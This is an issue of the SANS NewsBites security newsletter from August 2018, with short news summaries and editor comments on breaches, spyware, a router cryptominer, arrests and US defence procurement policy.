OnDemand Includes 4 Months Access to Course Content - Special Offers Available Now!

Newsletters: NewsBites

Subscribe to SANS Newsletters

Join the SANS Community to receive the latest curated cyber security news, vulnerabilities and mitigations, training opportunities, and our webcast schedule.

SANS NewsBites
@Risk: Security Alert
OUCH! Security Awareness
Case Leads DFIR Digest
Industrial Control Systems
Industrials & Infrastructure

SANS NewsBites is a semiweekly high-level executive summary of the most important news articles that have been published on computer security during the last week. Each news item is very briefly summarized and includes a reference on the web for detailed information, if possible.

Spend five minutes per week to keep up with the high-level perspective of all the latest security news. New issues are delivered free every Tuesday and Friday.

Volume XX - Issue #61

August 3, 2018


SANS NewsBites               August 3, 2018                Vol. 20, Num. 061



  Russian Hackers and US Utilities

  Reddit Data Breached by Intercepting SMS Two-Factor Authentication

  2019 National Defense Authorization Act Would Require US Companies to Disclose Foreign Source Code Reviews


  MikroTik Routers Used to Spread Cryptominer

  Cisco Patches Prime Collaboration Provisioning Password Flaw

  Three Alleged Members of FIN7 Cybercrime Group Arrested

  Conviction in Hospital Cyberattack

  Pentagons Do Not Buy List

  Russian Organizations Targeted in Phishing Scheme

  Malicious WhatsApp Message Used to Target Amnesty International Worker


***************************  Sponsored By Sophos Inc. ************************************

Live Webcast: With 75% of malware unique to a single organization you need to detect never-seen-before threats now. Join us to discover how Intercept X leverages multiple advanced techniques, including deep learning, anti-ransomware and anti-exploit technology, to stop both known and unknown malware in its tracks. Register Today!



-- SANS Network Security 2018 | Las Vegas, NV | September 23-30 | https://www.sans.org/event/network-security-2018

-- Data Breach Summit & Training 2018 | New York, NY | August 20-27 | https://www.sans.org/event/data-breach-summit-2018

-- SANS Virginia Beach 2018 | August 20-31 | https://www.sans.org/event/virginia-beach-2018

-- SANS Amsterdam September 2018 | September 3-8 | https://www.sans.org/event/amsterdam-septembers-2018

-- SANS Tokyo Autumn 2018 | September 3-15 | https://www.sans.org/event/tokyo-autumn-2018

-- Threat Hunting & Incident Response Summit 2018 | New Orleans, LA | September 6-13 | https://www.sans.org/event/threat-hunting-and-incident-response-summit-2018

-- SANS Baltimore Fall 2018 | September 8-15 | https://www.sans.org/event/baltimore-fall-2018

-- SANS London September 2018 | September 17-22 | https://www.sans.org/event/london-september-2018

-- SANS October Singapore 2018 | October 15-27 | https://www.sans.org/event/october-singapore-2018

-- SANS OnDemand and vLive Training

The SANS Training you want with the flexibility you need.

Final Week for Summer Special Offers with Online Training. Get a 10.5 iPad Pro, Samsung Galaxy Tab S3 or take $350 Off with Any OnDemand or vLive Course, Offer Ends August 8.


-- Can't travel? SANS offers online instruction for maximum flexibility

-- Live Daytime training with Simulcasthttps://www.sans.org/simulcast

-- Evening training 2x per week for 6 weeks with vLive | https://www.sans.org/vlive

-- Anywhere, Anytime access for 4 months with OnDemand format | https://www.sans.org/ondemand/

Single Course Training

-- Single Course Training

SANS Mentor |  https://www.sans.org/mentor/about

Community SANS | https://www.sans.org/community/


-- View the full SANS course catalog and Cyber Security Skills Roadmap






-Russian Hackers and US Utilities

(August 2, 2018)

According to analysts from Dragos, a cybercrime group they have dubbed Raspite has managed to breach networks at several electric utility companies. Dragos analysts say that Raspite has focused its energies on companies that deal with energy generation, transmission, and distribution. The group gained access to the utilities business systems through phishing and watering hole attacks. Raspite has targeted companies in the US, the Middle East, Europe, and East Asia. Symantec has also identified activity by the same group, which they have dubbed LeafMiner. 

[Editor Comments]

[Murray] The electric grid is our most sensitive infrastructure. In any modern conflict it will be turned on itself. The industry does not have a good cybersecurity record or culture. One expects these compromises to be monetized by selling them to potentially hostile nation states, certainly to include Russia.  

[Neely] Successfully attacking critical infrastructure will supplant the battlefield for critical victories in the future, highlighting the need to prioritize the defenses on these systems. Its not clear if the drive to secure these systems will be outpaced by the desire to implement new convenience interfaces to these same systems. Making security the priority will take fortitude, resources and support from the top in concert with risk-based regulatory requirements.


Read more in:

Dragos: Raspite


The Hill: Hackers breached US electric utilities: analysts



--Reddit Data Breached by Intercepting SMS Two-Factor Authentication

(August 1, 2018)

Reddit has disclosed that an attacker breached its systems in mid-June 2018. The breach compromised user emails, source code, internal files, and other data from 2007 and earlier. The attacker was able to gain access to the system because of weak two-factor authentication (2FA). The attacker gained access to several Reddit employee accounts at cloud and source code hosting providers by intercepting SMS messages that were used in the 2FA process. In a blog post, Reddit says, We learned that SMS-based authentication is not nearly as secure as we would hope, and the main attack was via SMS intercept. We point this out to encourage everyone here to move to token-based 2FA.

[Editor Comments]

[Neely]  While weve known there are issues with SMS based 2FA, it is still better than solely relying on reusable passwords. NIST SP 800-63-3 specifically recommends against it. Fortunately, other more secure options such as token-based 2FA (e.g. Google Auth, MS Authenticator, YubiKey, RSA SecurID, etc.) are becoming more prevalent. Given a choice, select token-based, and when implementing dont enable SMS based 2FA unless there is no other option.  

[Murray] While SMS-based authentication is orders of magnitude stronger than reuseable passwords, it is more vulnerable to attack than token-based. However, to date, attacks against it have involved take-over of the phone or phone number, often by social engineering, with the result that the legitimate party does not receive the requested one-time password. These attacks rely upon special knowledge of the association between the target account and the phone number. While less secure than token-based authentication, in many applications and environments SMS is both cheaper and more convenient.  


Read more in:

Reddit: We had a security incident. Here's what you need to know.


Wired: Reddit Got Hacked Thanks to a Woefully Insecure Two-Factor Setup


The Register: SMS 2FA gave us sweet FA security, says Reddit: Hackers stole database backup of user account info, posts, messages


Threatpost: Reddit Breach Stems from SMS Two-Factor Authentication Breakdown


KrebsOnSecurity: Reddit Breach Highlights Limits of SMS-Based Authentication


--2019 National Defense Authorization Act Would Require US Companies to Disclose Foreign Source Code Reviews

(August 1, 2018)

The final version of the Defense National Authorization Act (NDAA) for FY2019 includes a provision that requires US companies to disclose when they have allowed foreign countries to examine their source code. The House of Representatives approved the NDAA last week and the Senate approved it earlier this week.

[Editor Comments]

[Neely] Im not so sure this will be embraced by US companies trying to do business in those countries. Back in the 1990s, Moscow would not permit their government systems to run any software they had not performed assurance (source and security) reviews on. Since then, controls such as independent third-party review and requiring access to source under tight controls dont eliminate all the risks. US companies need to decide if they wish to follow HPE and McAfees lead and disallow source code reviews by government agencies.

Read more in:

Reuters: U.S. Congress passes bill forcing tech companies to disclose foreign software probes


FCW: Senate passes 2019 NDAA



**************************  SPONSORED LINKS  ********************************

1) "How Network Traffic Analytics Eliminates Darkspace for the SOC" with Barbara Kay and Chris Crowley. Register:  http://www.sans.org/info/205835

2) Don't Miss "Automating Open Source Security: A SANS Review of WhiteSource" Learn More: http://www.sans.org/info/205840

3) "Break Silos and respond to threats faster; Eliminating network and security silos to speed attack response" Register:  http://www.sans.org/info/205845




--MikroTik Routers Used to Spread Cryptominer

(August 2, 2018)

Attackers have compromised more than 170,000 MikroTik routers to place cryptomining software on websites. The routers are used by organizations, including Internet service providers (ISPs), to serve thousands of web pages every day. Most of the attacks targets thus far have been in Brazil, but it could spread. 

[Editor Comments]

[Ullrich] What is different here compared to prior router attacks is that the router itself isnt doing the crypto coin mining. Instead, the attacker modified HTML error pages that are displayed to users that use this routers http proxy features. Once a user encounters one of the modified pages, JavaScript is used to launch the Coinhive miner in the browser.

Read more in:

Threatpost: Huge Cryptomining Attack on ISP-Grade Routers Spreads Globally



--Cisco Patches Prime Collaboration Provisioning Password Flaw

(August 2, 2018)

Cisco has released an update to address a high-severity security flaw in its Prime Collaboration Provisioning software versions 12.2 and earlier. The issue is due to insufficient validation of a password change request. There are no workarounds available.

Read more in:

SC Magazine: Cisco patches password-related vulnerability


Cisco: Cisco Prime Collaboration Provisioning Unauthorized Password Change Denial of Service Vulnerability



--Three Alleged Members of FIN7 Cybercrime Group Arrested

(August 1 & 2, 2018)

The US Department of Justice (DOJ) has indicted three Ukrainian citizens for their alleged roles in a series of attacks on computer networks at businesses across the US, including Chipotle and Chilis. They face multiple felony charges including conspiracy, wire fraud, computer hacking, access device fraud, and aggravated identity theft. The three are allegedly members of a group known as FIN7, which is also known as Carbabak and JokerStash. The suspects were arrested in Europe; one has been extradited, and the US has requested extradition of the others.

Read more in:

DOJ: Three Members of Notorious International Cybercrime Group Fin7 In Custody for Role in Attacking Over 100 U.S. companies


The Register: The End for Fin7: Feds cuff suspected super-crooks after $$$m stolen from 15m+ credit cards


Reuters: U.S. charges three Ukrainians in payment card hacking spree


Dark Reading: Feds Indict Three Ukrainians For Cyberattacks on 100+ Companies


Wired: The Wild Inner Workings of a Billion-Dollar Hacking Group



--Conviction in Hospital Cyberattack

(August 1 & 2, 2018)

A federal jury in Massachusetts found Martin Gottesfeld guilty of conspiracy to damage protected computers and damaging protected computers. Gottesfeld launched distributed denial-of-service (DDOS) attacks against networks at a residential treatment facility and the Childrens Hospital of Boston; the attack against the hospital network temporarily knocked it offline and also affected other hospitals in the area. Gottesfeld launched the attacks on behalf of the Anonymous hacking collective in protest of the hospitals action in a custody case.   

Read more in:

Reuters: Massachusetts man convicted of cyber attack on hospital


Bleeping Computer: Jury Convicts Anonymous Hacker Who DDoSed Children's Hospital, Later Got Lost at Sea


SC Magazine: Sinking feeling: Hacktivist rescued by Disney Cruise ship convicted for DDoS attacks against health facilities



--Pentagons Do Not Buy List

(July 27 & 31, 2018)

The US Department of Defense (DOD) has compiled a Do Not Buy list of vendors known to use code from China or Russia. The Pentagon created the list of products for its contractors and procurement teams. Ellen Lord, defense undersecretary for acquisition and sustainment, says that the list includes products that fail to meet national security standards. Although the list has not been publicly released, Kaspersky Lab and ZTE are known to have already been banned by the government.    

[Editor Comments]

[Neely] Federal information systems are only supposed to run approved software. Part of that approval is to assess the suitability of the software based on multiple risks including origin and who has access to the source code. Contractors need to follow similar guidelines; this reduces the burden of completing that analysis in-house. The downside is this can lead to discovery of known-bad software in your environment which will need to be methodically and expeditiously replaced to not put current and future contracts in jeopardy.

[Murray] While we have long advocated for the DoD to use its buying power to encourage more secure products, this blanket targeting of vendors is not what we had in mind.

Read more in:

Defense One: Pentagon Creates Do Not Buy List of Russian, Chinese Software


Reuters: Pentagon creating software 'do not buy' list to keep out Russia, China


SC Magazine: Pentagon reveals a Do Not Buy software list as a cybersecurity measure



--Russian Organizations Targeted in Phishing Scheme

(August 1, 2018)

Researchers at Kaspersky Lab have identified a phishing scheme that is targeting organizations associated with industrial production. The phishing emails masquerade as commercial offers; the majority of targeted organizations are in Russia. The goal of the attacks appears to be stealing money from the organizations accounts. 

Read more in:

Securelist: Attacks on industrial enterprises using RMS and TeamViewer


SC Magazine: Russian spearphishing campaign targeted nearly 800 PCs at more than 400 companies



--Malicious WhatsApp Message Used to Target Amnesty International Worker

(July 31 & August 1, 2018)

A malicious link in a WhatsApp message attempted to infect an Amnesty International workers smartphone with Pegasus spyware. Pegasus is a sophisticated tool used by nation-states. According to an Amnesty International blog post, a second individual received a similar malicious message. Neither employee clicked on the malicious link.

[Murray] WhatsApp is no more or less vulnerable to such an attack than most other messaging software. Android is more vulnerable to such an attack than iOS. WhatsApp provides device-to-device encryption in a population of heterogeneous devices. Device-to-device encryption should not be relied upon for life or death applications where person-to-person encryption is indicated.  


Read more in:

Amnesty International: Amnesty International Among Targets of NSO-powered Campaign


Citizen Lab: NSO Group Infrastructure Linked to Targeting of Amnesty International and Saudi Dissident


Cyberscoop: Report: Powerful spyware used to target Amnesty International employee and Saudi activist


Threatpost: Amnesty International Targeted by Nation-State Spyware


Motherboard: Powerful Smartphone Malware Used to Target Amnesty International Researcher





Powershell Inside Certificates




Big Star Labs Spyware


Facebook Smishing Attack


Google Improves "Government Sponsored Attacks" Alert for GSuite


Port 52869 UPNP Attacks


Malware in Animated GIF Files


MikroTik Miner Botnet


Microsoft Edge Vulnerability


Microsoft Improves Account Security for Midterm Elections



The Editorial Board of SANS NewsBites


John Pescatore was Vice President at Gartner Inc. for fourteen years. He became a director of the SANS Institute in 2013. He has worked in computer and network security since 1978 including time at the NSA and the U.S. Secret Service.

Shawn Henry is president of CrowdStrike Services. He retired as FBI Executive Assistant Director responsible for all criminal and cyber programs and investigations worldwide, as well as international operations and the FBI's critical incident response.

Suzanne Vautrinot was Commander of the 24th Air Force (AF Cyber) and now sits on the board of directors of Wells Fargo and several other major organizations.

Ed Skoudis is co-founder of CounterHack, the nation's top producer of cyber ranges, simulations, and competitive challenges, now used from high schools to the Air Force. He is also author and lead instructor of the SANS Hacker Exploits and Incident Handling course, and Penetration Testing course.

Michael Assante was Vice President and Chief Security Officer at NERC, led a key control systems group at Idaho National Labs, and was American Electric Power's CSO. He now leads the global cyber skills development program at SANS for power, oil & gas and other critical infrastructure industries.

Mark Weatherford is Chief Cybersecurity Strategist at vArmour and the former Deputy Under Secretary of Cybersecurity at the US Department of Homeland Security.

Stephen Northcutt teaches advanced courses in cyber security management; he founded the GIAC certification and was the founding President of STI, the premier skills-based cyber security graduate school, www.sans.edu.

Dr. Johannes Ullrich is Chief Technology Officer of the Internet Storm Center and Dean of the Faculty of the graduate school at the SANS Technology Institute.

William Hugh Murray is an executive consultant and trainer in Information Assurance and Associate Professor at the Naval Postgraduate School.

Lee Neely is a Senior Cyber Analyst at Lawrence Livermore National Laboratory, SANS Analyst and Mentor. He has worked in computer security since 1989.

Rob Lee is the SANS Institute's top forensics instructor and director of the digital forensics and incident response research and education program at SANS (computer-forensics.sans.org).

Tom Liston is member of the Cyber Network Defense team at UAE-based Dark Matter. He is a Handler for the SANS Institute's Internet Storm Center and co-author of the book Counter Hack Reloaded.

Jake Williams is a SANS course author and the founder of Rendition Infosec, with experience securing DoD, healthcare, and ICS environments.

Dr. Eric Cole is an instructor, author and fellow with The SANS Institute. He has written five books, including Insider Threat and he is a founder with Secure Anchor Consulting.

Mason Brown is one of a very small number of people in the information security field who have held a top management position in a Fortune 50 company (Alcoa). He leads SANS' efforts to raise the bar in cybersecurity education around the world.

David Hoelzer is the director of research & principal examiner for Enclave Forensics and a senior fellow with the SANS Technology Institute.

Gal Shpantzer is a trusted advisor to CSOs of large corporations, technology startups, Ivy League universities and non-profits specializing in critical infrastructure protection. Gal created the Security Outliers project in 2009, focusing on the role of culture in risk management outcomes and contributes to the Infosec Burnout project.

Eric Cornelius is Director of Critical Infrastructure and ICS at Cylance, and earlier served as deputy director and chief technical analyst for the Control Systems Security Program at the US Department of Homeland Security.

Alan Paller is director of research at the SANS Institute.

Brian Honan is an independent security consultant based in Dublin, Ireland.

David Turley is SANS operations manager and serves as production manager and final editor on SANS NewsBites.

Please feel free to share this with interested parties via email, but no posting is allowed on web sites. For a free subscription visit https://www.sans.org/account/create